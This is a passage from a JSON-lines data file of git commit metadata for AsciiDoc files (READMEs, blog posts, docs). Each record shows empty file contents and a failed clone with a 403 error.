readme\n","repos":"tschulte\/griffon,levymoreira\/griffon,tschulte\/griffon,levymoreira\/griffon,levymoreira\/griffon,tschulte\/griffon,griffon\/griffon,griffon\/griffon","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tschulte\/griffon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eceeab50ab797a160cf0b9b7e92ce2a19fdebace","subject":"README: forgot `make`","message":"README: forgot `make`\n","repos":"Somasis\/scripts","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Somasis\/scripts.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"575463fa6caa6522029497a172e0b2685838e522","subject":"update README","message":"update README\n","repos":"ozlerhakan\/poiji,ozlerhakan\/poiji","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ozlerhakan\/poiji.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5255384f931a05e868dbb81fcee288995a370d20","subject":"problem: not clear how to start contributing","message":"problem: not clear how to start contributing\n\nIt's confusing for new contributors to get started even after reading the C4.\r\n \r\nsolution: add FAQ template from Blockrazor as a starting point for actions that new contributors should take.","repos":"sjmackenzie\/fractalide,fractalide\/fractalide,fractalide\/fractalide,dmichiels\/fractalide,sjmackenzie\/fractalide,fractalide\/fractalide,dmichiels\/fractalide,dmichiels\/fractalide,sjmackenzie\/fractalide","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fractalide\/fractalide.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"6de98f5680930f342df707bec3b3c51f4ee14955","subject":"documents","message":"documents\n","repos":"crabzilla\/crabzilla","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crabzilla\/crabzilla.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"777b55e733c4d53830beead20e22de5677efdc37","subject":"Update 2011-10-04-Day-one-Technical-Keynote.adoc","message":"Update 2011-10-04-Day-one-Technical-Keynote.adoc","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2011-10-04-Day-one-Technical-Keynote.adoc","new_file":"_posts\/2011-10-04-Day-one-Technical-Keynote.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f19f18a73704643eeffc69265fb804a8a3d2aa7","subject":"Update 2017-11-30-Best-Diet-for-Programmers-Software-Enginners-Hackers-Geeks.adoc","message":"Update 
2017-11-30-Best-Diet-for-Programmers-Software-Enginners-Hackers-Geeks.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-30-Best-Diet-for-Programmers-Software-Enginners-Hackers-Geeks.adoc","new_file":"_posts\/2017-11-30-Best-Diet-for-Programmers-Software-Enginners-Hackers-Geeks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6b9ba77214e021f3aca5c477cd93db588b1c21d","subject":"Adding 1.0 CR1 release announcement","message":"Adding 1.0 CR1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-12-12-debezium-1-0-0-cr1-released.adoc","new_file":"blog\/2019-12-12-debezium-1-0-0-cr1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e7ed3b18607599c240ec70bdbf1acd43792b036","subject":"Publish 2016-5-13-Engineer-Career-Path.adoc","message":"Publish 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-5-13-Engineer-Career-Path.adoc","new_file":"2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d1734649116a454a65022bad4e8185bc54c51d7","subject":"Update 2015-07-29-Farewell-to-Google-Code.adoc","message":"Update 2015-07-29-Farewell-to-Google-Code.adoc","repos":"ciptard\/ciptard.github.io,ciptard\/ciptard.github.io,ciptard\/ciptard.github.io","old_file":"_posts\/2015-07-29-Farewell-to-Google-Code.adoc","new_file":"_posts\/2015-07-29-Farewell-to-Google-Code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ciptard\/ciptard.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31dc7a7cabfe50ff2353b4641628973fe1dfc5c2","subject":"Update 2017-10-11.adoc","message":"Update 2017-10-11.adoc","repos":"uskithub\/uskithub.github.io,uskithub\/uskithub.github.io,uskithub\/uskithub.github.io,uskithub\/uskithub.github.io","old_file":"_posts\/2017-10-11.adoc","new_file":"_posts\/2017-10-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uskithub\/uskithub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bfdb885785918bba410c67219756de4b743d2da4","subject":"Create README.adoc","message":"Create README.adoc","repos":"twister2016\/twister,twister2016\/twister,twister2016\/twister,twister2016\/twister","old_file":"examples\/icmp_reply\/README.adoc","new_file":"examples\/icmp_reply\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/twister2016\/twister.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1b28acbb3fe9fc36db7e67a47ca82fb648b04296","subject":"Update 2019-03-19-Backup-Menggunakan-Gdrive.adoc","message":"Update 2019-03-19-Backup-Menggunakan-Gdrive.adoc","repos":"anggadjava\/anggadjava.github.io,anggadjava\/anggadjava.github.io,anggadjava\/anggadjava.github.io","old_file":"_posts\/2019-03-19-Backup-Menggunakan-Gdrive.adoc","new_file":"_posts\/2019-03-19-Backup-Menggunakan-Gdrive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anggadjava\/anggadjava.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d4d8eb2bb51037556d39d30c8c1fba3ae364db8","subject":"Update 2019-08-12-el-Clubo-Ahora-asi-suenan.adoc","message":"Update 2019-08-12-el-Clubo-Ahora-asi-suenan.adoc","repos":"dgrizzla\/dgrizzla.github.io,dgrizzla\/dgrizzla.github.io,dgrizzla\/dgrizzla.github.io,dgrizzla\/dgrizzla.github.io","old_file":"_posts\/2019-08-12-el-Clubo-Ahora-asi-suenan.adoc","new_file":"_posts\/2019-08-12-el-Clubo-Ahora-asi-suenan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dgrizzla\/dgrizzla.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c57f565720f19703766a5d7408f79d7378b79c0","subject":"Update 2015-02-21-puppetlabs-aptnext.adoc","message":"Update 2015-02-21-puppetlabs-aptnext.adoc","repos":"thiderman\/daenney.github.io,thiderman\/daenney.github.io,thiderman\/daenney.github.io","old_file":"_posts\/2015-02-21-puppetlabs-aptnext.adoc","new_file":"_posts\/2015-02-21-puppetlabs-aptnext.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thiderman\/daenney.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d11762346c7a4800da2853338432a43a57352ab","subject":"Update 2017-08-25-Thrasos-Code-Snips.adoc","message":"Update 2017-08-25-Thrasos-Code-Snips.adoc","repos":"thrasos\/thrasos.github.io,thrasos\/thrasos.github.io,thrasos\/thrasos.github.io,thrasos\/thrasos.github.io","old_file":"_posts\/2017-08-25-Thrasos-Code-Snips.adoc","new_file":"_posts\/2017-08-25-Thrasos-Code-Snips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thrasos\/thrasos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80789ac127f451584db71506bc99586d5a159d74","subject":"Update 2015-01-19-Need-More-Coffee.adoc","message":"Update 2015-01-19-Need-More-Coffee.adoc","repos":"tedbergeron\/hubpress.io,tedbergeron\/hubpress.io,tedbergeron\/hubpress.io,tedbergeron\/hubpress.io","old_file":"_posts\/2015-01-19-Need-More-Coffee.adoc","new_file":"_posts\/2015-01-19-Need-More-Coffee.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tedbergeron\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"485009b407674b8a4a57d3aa1f19ebe507d0c46a","subject":"Publish 2016-6-29-PHP-CSV.adoc","message":"Publish 2016-6-29-PHP-CSV.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-29-PHP-CSV.adoc","new_file":"2016-6-29-PHP-CSV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4bb8eab5f8616dccb681051a99988ac5adf45f5","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e3fcbd3019bf04d029c58eb404dda60bf43ba33","subject":"Update 2017-01-21-Swap-Numbers.adoc","message":"Update 2017-01-21-Swap-Numbers.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-01-21-Swap-Numbers.adoc","new_file":"_posts\/2017-01-21-Swap-Numbers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59d935cb98bbb12fee93ba9271b875ea3e9fb521","subject":"Update 2019-01-31-till20170307.adoc","message":"Update 2019-01-31-till20170307.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"_posts\/2019-01-31-till20170307.adoc","new_file":"_posts\/2019-01-31-till20170307.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e464f33c2534f2e27f7aac9c1afdba9af5055b7f","subject":"job: #11745 first draft design note","message":"job: #11745 first draft design note\n","repos":"keithbrown\/mc,leviathan747\/mc,leviathan747\/mc,rmulvey\/mc,xtuml\/mc,xtuml\/mc,leviathan747\/mc,lwriemen\/mc,xtuml\/mc,cortlandstarrett\/mc,keithbrown\/mc,cortlandstarrett\/mc,rmulvey\/mc,keithbrown\/mc,rmulvey\/mc,keithbrown\/mc,xtuml\/mc,keithbrown\/mc,cortlandstarrett\/mc,leviathan747\/mc,xtuml\/mc,cortlandstarrett\/mc,rmulvey\/mc,lwriemen\/mc,lwriemen\/mc,lwriemen\/mc,keithbrown\/mc,lwriemen\/mc,leviathan747\/mc,xtuml\/mc,lwriemen\/mc,leviathan747\/mc,cortlandstarrett\/mc,rmulvey\/mc,cortlandstarrett\/mc,rmulvey\/mc","old_file":"doc\/notes\/11745_loadmasl\/11745_loadmasl_dnt.adoc","new_file":"doc\/notes\/11745_loadmasl\/11745_loadmasl_dnt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leviathan747\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1956e813eae7156328931adaf4a17c8509126f9e","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d0233c68f58ef26b0f4ee0d36729885777788bc","subject":"Update 2016-02-12-The-start.adoc","message":"Update 2016-02-12-The-start.adoc","repos":"jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io","old_file":"_posts\/2016-02-12-The-start.adoc","new_file":"_posts\/2016-02-12-The-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jblemee\/jblemee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d0c5b68adf388e5189aed3f9f90eb51c4a38d4d","subject":"emphasize storage","message":"emphasize storage\n\nSigned-off-by: Dan Mack <f52cae7d677fd8a83ac7cc4406c1d073a69a7b23@macktronics.com>\n","repos":"danmack\/resume","old_file":"overview.adoc","new_file":"overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danmack\/resume.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce27be060fc856b78dfe8b324e2532f8b1d07f5c","subject":"Add README.","message":"Add README.\n","repos":"zeroleaf\/com.zeroleaf,zeroleaf\/com.zeroleaf","old_file":"ProgressBar\/README.adoc","new_file":"ProgressBar\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zeroleaf\/com.zeroleaf.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b07eca4bda30cb67d19512485a0ed68e95d6d1de","subject":"Testing adoc","message":"Testing adoc\n","repos":"okaram\/IntroJava,okaram\/IntroJava,okaram\/IntroJava","old_file":"first.adoc","new_file":"first.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/okaram\/IntroJava.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"f00d0a2b4b65a468e2e5ffbbd32b958a071cad4b","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe17cbcca2a4e9f7734bf25dffb072c61e9cb074","subject":"ConnectX-4 support","message":"ConnectX-4 support\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"doc\/trex_book.asciidoc","new_file":"doc\/trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e9d6126267717fb7b69ead47c8743362f25bf2c8","subject":"Update 2016-06-07-Powitanie-cel-bloga.adoc","message":"Update 
2016-06-07-Powitanie-cel-bloga.adoc","repos":"pzmarzly\/pzmarzly.github.io,pzmarzly\/g2zory,pzmarzly\/pzmarzly.github.io,pzmarzly\/g2zory,pzmarzly\/g2zory,pzmarzly\/g2zory,pzmarzly\/pzmarzly.github.io,pzmarzly\/pzmarzly.github.io","old_file":"_posts\/2016-06-07-Powitanie-cel-bloga.adoc","new_file":"_posts\/2016-06-07-Powitanie-cel-bloga.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pzmarzly\/pzmarzly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"511ebbce11d9e5d53a80af9eb1a2f8558618f8ee","subject":"Update 2017-01-13-memo-like-Ascii-Doc.adoc","message":"Update 2017-01-13-memo-like-Ascii-Doc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-Ascii-Doc.adoc","new_file":"_posts\/2017-01-13-memo-like-Ascii-Doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff594a0057568f0c1bcef2f7496cdef90f7dd400","subject":"Update 2017-06-20-Mostly-About-Trials.adoc","message":"Update 2017-06-20-Mostly-About-Trials.adoc","repos":"mcornell\/OFM,mcornell\/OFM,mcornell\/OFM,mcornell\/OFM","old_file":"_posts\/2017-06-20-Mostly-About-Trials.adoc","new_file":"_posts\/2017-06-20-Mostly-About-Trials.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcornell\/OFM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ab1da3b84824f345bea31828d894d8484b25623","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11e8613b8aed7e22c68ccd678688097614110b42","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45e6d13191f2d334132aa19c11511778a97eff87","subject":"Publish 2016-09-09.adoc","message":"Publish 2016-09-09.adoc","repos":"bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io","old_file":"2016-09-09.adoc","new_file":"2016-09-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitcowboy\/bitcowboy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"21ac18263fc01047ba1f99a38c13e13ab36bcf7f","subject":"Update 2013-10-13-Neo4j-mais-quest-ce-aue-cest.adoc","message":"Update 2013-10-13-Neo4j-mais-quest-ce-aue-cest.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2013-10-13-Neo4j-mais-quest-ce-aue-cest.adoc","new_file":"_posts\/2013-10-13-Neo4j-mais-quest-ce-aue-cest.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4713f84eea671aee04f7b4f28a2b14157a227a14","subject":"Update 2016-02-18-The-Wild-Success-of-XProc-v1.adoc","message":"Update 2016-02-18-The-Wild-Success-of-XProc-v1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-02-18-The-Wild-Success-of-XProc-v1.adoc","new_file":"_posts\/2016-02-18-The-Wild-Success-of-XProc-v1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4b632854e139d1602ec53dbd43f26806e63746e","subject":"Add reference to other platforms","message":"Add reference to other platforms","repos":"maleck13\/origin,dcrisan\/origin,levivic\/origin,rhuss\/origin,adelton\/origin,domenicbove\/origin,christian-posta\/origin,chlunde\/origin,rajkotecha\/origin,tjanez\/origin,ibotty\/origin,ocsbrandon\/origin,gruiz17\/origin,ironcladlou\/origin,jwforres\/origin,raffaelespazzoli\/origin,aweiteka\/origin,marun\/origin,gabemontero\/origin,elyscape\/origin,dinhxuanvu\/origin,jhadvig\/origin,janetkuo\/origin,nak3\/origin,xiuwang\/origin,elyscape\/origin,nak3\/origin,mdshuai\/origin,marun\/origin,biyiklioglu\/origin,lixueclaire\/origin,greyfairer\/openshift-origin,soltysh\/origin,pweil-\/origin,Tlacenka\/origin,imcsk8\/origin,fkirill\/origin,rchicoli\/openshift-origin,markllama\/origin,chlunde\/origin,lorenzogm\/openshift-origin,tnozicka\/origin,pravisankar\/origin,benjaminapetersen\/origin,danwinship\/origin,linzhaoming\/origin,cgwalters\/origin,linux-on-ibm-z\/origin,pgmcd\/origin,tdawson\/origin,gruiz17\/origin,mdshuai\/origin,robertol\/origin,projectatomic\/atomic-enterprise,arilivigni\/origin,xuant\/origin,y0no\/origin,tnozicka\/origin,ashcrow\/origin,aweiteka\/origin,marun\/origin,burmanm\/origin,jhammant\/origin,ibotty\/origin,jeffvance\/origin,janetkuo\/origin,markllama\/origin,spohnan\/origin,moolitayer\/origin,ocsbrandon\/origin,y0no\/origin,samsong8610\/origin,Tlacenka\/origin,simo5\/origin,danwinship\/origin,pmorie\/origin,PI-Victor\/origin,joshuawilson\/origin,markllama\/origin,stevekuznetsov\/origin,enj\/origin,ocsbrandon\/origin,bowenha2\/origin,tjanez\/origin,yepengxj\/df,rusenask\/origin,aweiteka\/origin,childsb\/origin,bparees\/origin,pgmcd\/origin,ravisantoshgudimetla\/origin,sosiouxme\/origin,adelton\/origin,adelton\/origin,jwhonce\/origin,ramr\/origin,hferentschik\/origin,fkirill\/origin,liangxia\/origin,sg00dwin\/origin,eparis\/origin,tjcunliffe\/origin,janetkuo\/origin,tagoh\/origin,rrati\/origin,chmouel\/origin,christian-posta\/origin,benjaminapetersen\/origin,thrasher-redhat\/origin,kargakis\/origin,jprukner\/origin,lorenzogm\/openshift-origin,y0no\/origin,robertol\/origin,pombredanne\/atomic-enterprise,liggitt\/origin,yepengxj\/df,wyue-re
dhat\/origin,PI-Victor\/origin,pacoja84\/origin,ibotty\/origin,domenicbove\/origin,pkdevbox\/origin,goern\/origin,dustintownsend\/origin,ejemba\/origin,jeffvance\/origin,dcrisan\/origin,greyfairer\/openshift-origin,benjaminapetersen\/origin,codificat\/origin,yepengxj\/df,lixueclaire\/origin,linearregression\/origin,willmtemple\/origin,dobbymoodge\/origin,westmisfit\/origin,juanvallejo\/origin,projectatomic\/atomic-enterprise,dkorn\/origin,legionus\/origin,gesrat-cisco\/origin,hingstarne\/origin,dmage\/origin,quantiply-fork\/origin,smarterclayton\/origin,bowenha2\/origin,rhuss\/origin,jeffvance\/origin,jdnieto\/origin,maxamillion\/origin,levivic\/origin,zofuthan\/origin,wanghaoran1988\/atomic-enterprise,arilivigni\/origin,romanbartl\/origin,wanghaoran1988\/origin,jpeeler\/origin,projectatomic\/atomic-enterprise,dgoodwin\/origin,quantiply-fork\/origin,spohnan\/origin,EricMountain-1A\/openshift-origin,adietish\/origin,dcbw\/origin,mkumatag\/origin,spadgett\/origin,imcsk8\/origin,jwforres\/origin,smarterclayton\/origin,hingstarne\/origin,hroyrh\/origin,jdnieto\/origin,dobbymoodge\/origin,jpeeler\/origin,Miciah\/origin,rootfs\/origin,nhr\/origin,ryanj\/origin,markllama\/atomic-enterprise,lorenzogm\/openshift-origin,ashcrow\/origin,Nick-Harvey\/origin,rchicoli\/openshift-origin,nhr\/origin,miminar\/origin,nhr\/origin,benjaminapetersen\/origin,quantiply-fork\/origin,jsafrane\/origin,php-coder\/origin,cgwalters\/origin,robertol\/origin,cgwalters\/origin,fkirill\/origin,jprukner\/origin,janetkuo\/origin,burmanm\/origin,rhuss\/origin,craigmunro\/origin,StevenLudwig\/origin,ryanj\/origin,pmorie\/origin,php-coder\/origin,dkorn\/origin,inlandsee\/origin,sjug\/origin,aveshagarwal\/origin,mingderwang\/origin,jprukner\/origin,detiber\/origin,JacobTanenbaum\/origin,rchicoli\/openshift-origin,jeremyeder\/origin,zofuthan\/origin,dkorn\/origin,thesteve0\/origin,Nick-Harvey\/origin,maxamillion\/origin,mfojtik\/origin,projectatomic\/atomic-enterprise,jupierce\/origin,moolitayer\/origin,myfear\/origin,jsafrane\/origin,marsmensch\/atomic-enterprise,sferich888\/origin,asiainfoLDP\/datafactory,knobunc\/origin,chlunde\/origin,danmcp\/origin,mnagy\/origin,danmcp\/origin,chmouel\/origin,stefwalter\/origin,csrwng\/origin,jhammant\/origin,ashcrow\/origin,coreydaley\/origin,nitintutlani\/origin,gesrat-cisco\/origin,chlunde\/origin,spohnan\/origin,maleck13\/origin,PI-Victor\/origin,rhamilto\/origin,romanbartl\/origin,juanvallejo\/origin,YannMoisan\/origin,willmtemple\/origin,mrunalp\/origin,wanghaoran1988\/origin,inlandsee\/origin,mingderwang\/origin,tnguyen-rh\/origin,mnagy\/origin,dustintownsend\/origin,pkdevbox\/origin,nitintutlani\/origin,rrati\/origin,allevo\/origin,maleck13\/origin,mrogers950\/origin,myfear\/origin,tjanez\/origin,pacoja84\/origin,levivic\/origin,nitintutlani\/origin,wanghaoran1988\/origin,quantiply-fork\/origin,simo5\/origin,benjaminapetersen\/origin,tdawson\/origin,pombredanne\/atomic-enterprise,aveshagarwal\/origin,YannMoisan\/origin,mfisher-rht\/origin,legionus\/origin,matthyx\/origin,imcsk8\/origin,Tlacenka\/origin,adietish\/origin,dinhxuanvu\/origin,wjiangjay\/origin,ncdc\/origin,vongalpha\/origin,raffaelespazzoli\/origin,spohnan\/origin,mfojtik\/origin,knobunc\/origin,nitintutlani\/origin,mjisyang\/origin,westmisfit\/origin,bparees\/origin,danmcp\/origin,zhaosijun\/origin,myfear\/origin,ashcrow\/origin,danmcp\/origin,dkorn\/origin,wyue-redhat\/origin,seveillac\/origin,oybed\/origin,hferentschik\/origin,christian-posta\/origin,jeremyeder\/origin,senayar\/origin,mahak\/origin,dcbw\/origin,swizzle
